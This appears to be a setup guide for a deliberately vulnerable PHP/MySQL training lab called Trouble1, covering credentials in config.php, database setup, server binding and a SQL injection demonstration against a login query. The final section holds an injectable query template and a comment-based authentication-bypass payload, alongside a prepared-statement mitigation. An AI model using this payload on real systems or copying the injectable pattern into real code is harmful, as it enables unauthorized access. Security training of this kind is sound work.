Trouble1
Configuration in config.php
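<?php
// Connection settings for the Trouble1 lab database.
// NOTE(review): username and password are the same fixed values the CREATE USER
// step of this guide uses. Outside the lab, load them from the environment or a
// file kept out of the web root and out of version control.
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'student');
define('DB_PASSWORD', 'studentlab');
define('DB_DATABASE', 'trouble1');

// Open the connection exposed as $db (presumably used by the pages that include
// this file). mysqli_connect() signals failure either by returning false or, when
// mysqli's exception mode is on (the default since PHP 8.1), by throwing
// mysqli_sql_exception, so both paths are handled here.
try {
    $db = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_DATABASE);
} catch (mysqli_sql_exception $e) {
    $db = false;
}

if ($db === false) {
    // The driver's message goes to the server log only; the client gets a generic
    // error so host, user and schema details are not echoed back.
    error_log('Database connection failed: ' . mysqli_connect_error());
    http_response_code(500);
    exit('Database connection failed.');
}
?>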
Create the MySQL user student
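# Lab account that config.php connects with (same values as DB_USERNAME / DB_PASSWORD).
CREATE USER 'student'@'localhost' IDENTIFIED BY 'studentlab';
# Grant on the lab schema only instead of *.*: the application using this account
# contains an injectable query, so any privilege given here is also available to an
# injected statement. Scoping to trouble1 keeps other schemas and server-wide
# privileges out of reach. If an exercise needs more, grant that privilege explicitly.
GRANT ALL PRIVILEGES ON trouble1.* TO 'student'@'localhost';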
Set up the database
# Start the MySQL server.
service mysql start
# Create the empty lab database (prompts for the MySQL root password).
mysql --user=root --password --execute="create database trouble1"
# Load lab.sql into the trouble1 database (prompts for the root password again).
mysql --user=root --password trouble1 < lab.sql
# Drop the lab database. This is a SQL statement, so run it inside the mysql client;
# it deletes the trouble1 database and everything in it.
DROP DATABASE trouble1;
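# Loopback only - cannot be accessed by Burp Suite.
# Port 8000 is unprivileged, so the PHP built-in server does not need sudo; running
# it as a normal user keeps the intentionally vulnerable app from executing as root.
$ php -S localhost:8000
# Make the server accessible on your network.
# 0.0.0.0 binds every interface, so any host that can reach this machine can reach
# the injectable login page; use this only on an isolated lab network.
$ php -S 0.0.0.0:8000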
MySQL injection in Login.php
# Query template: the PHP variables $myusername, $passtoken and $mypassword are
# interpolated straight into the SQL string, inside single quotes.
SELECT id FROM users WHERE username = '$myusername' and SHA1(CONCAT(password, '$passtoken'))='$mypassword'
# Effective query once the username value closes the string literal and opens a
# comment: the WHERE clause is reduced to the username match plus an always-true
# condition.
SELECT id FROM users WHERE username = 'trouble1' and 1=1; --
# Same statement with the tail of the template shown: everything after "-- ",
# including the SHA1 password comparison, is treated as a comment and never evaluated.
# NOTE(review): this line selects from admin while the template selects from users;
# confirm which table Login.php queries.
# Mitigation: pass the values as bound parameters (mysqli_prepare with
# mysqli_stmt_bind_param) so that input is handled as data, not as SQL text.
SELECT id FROM admin WHERE username = 'trouble1' and 1=1; -- ' and SHA1(CONCAT(password, '$passtoken'))='$mypassword'